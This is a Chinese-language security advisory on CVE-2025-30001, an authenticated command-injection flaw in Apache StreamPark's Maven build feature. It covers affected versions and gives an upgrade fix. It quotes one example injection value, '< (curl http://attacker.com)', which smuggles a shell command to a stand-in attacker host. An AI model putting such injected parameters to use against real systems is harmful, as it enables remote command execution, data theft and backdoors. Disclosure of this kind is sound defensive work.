Apache StreamPark远程命令执行CVE-2025-30001

Apache StreamPark 是一个面向 Flink/Spark 一站式流处理计算平台与开发框架，它在开发期提供统一脚手架、配置约定和丰富的连接器。

一、基本情况

Apache StreamPark 提供一个易于使用的开发框架，使开发者能够高效地构建流处理应用，支持多种版本 Apache Flink和 Apache Spark。

Apache StreamPark 不仅规范了项目的配置、鼓励函数式编程、定义了最佳的编程方式，且提供一系列开箱即用的连接器（Connector）。

栋科技漏洞库关注到 Apache StreamPark 受影响版本中存在一个错误执行分配权限漏洞，被追踪为CVE-2025-30001，CVSS 3.X评分7.3。

二、漏洞分析

CVE-2025-30001漏洞是存在于 Apache StreamPark 受影响版本中的错误执行分配权限漏洞，经过身份验证的用户可以触发远程命令执行。

该漏洞被利用的前提是攻击者需登录StreamPark 系统，并拥有系统级权限（如管理员或具备项目管理权限的用户）才有可能触发该漏洞。

然后在项目模块中利用Maven编译功能参数校验缺陷注入恶意命令，如通过构造包含 < 操作符参数（如 "< (curl http://attacker.com)"）

攻击者通过Web界面提交包含恶意参数Maven编译任务，服务器端未对参数进行有效过滤直接将参数传递给底层shell执行，导致命令注入。

潜在风险包括攻击者可执行任意系统命令，如窃取数据、植入后门、控制服务器等；若服务进程以高权限运行，攻击可导致系统完全失控。

三、影响范围

2.1.4 <= Apache StreamPark <2.1.6

四、修复建议

Apache StreamPark >= 2.1.6

五、参考链接

管理员已设置登录后刷新可查看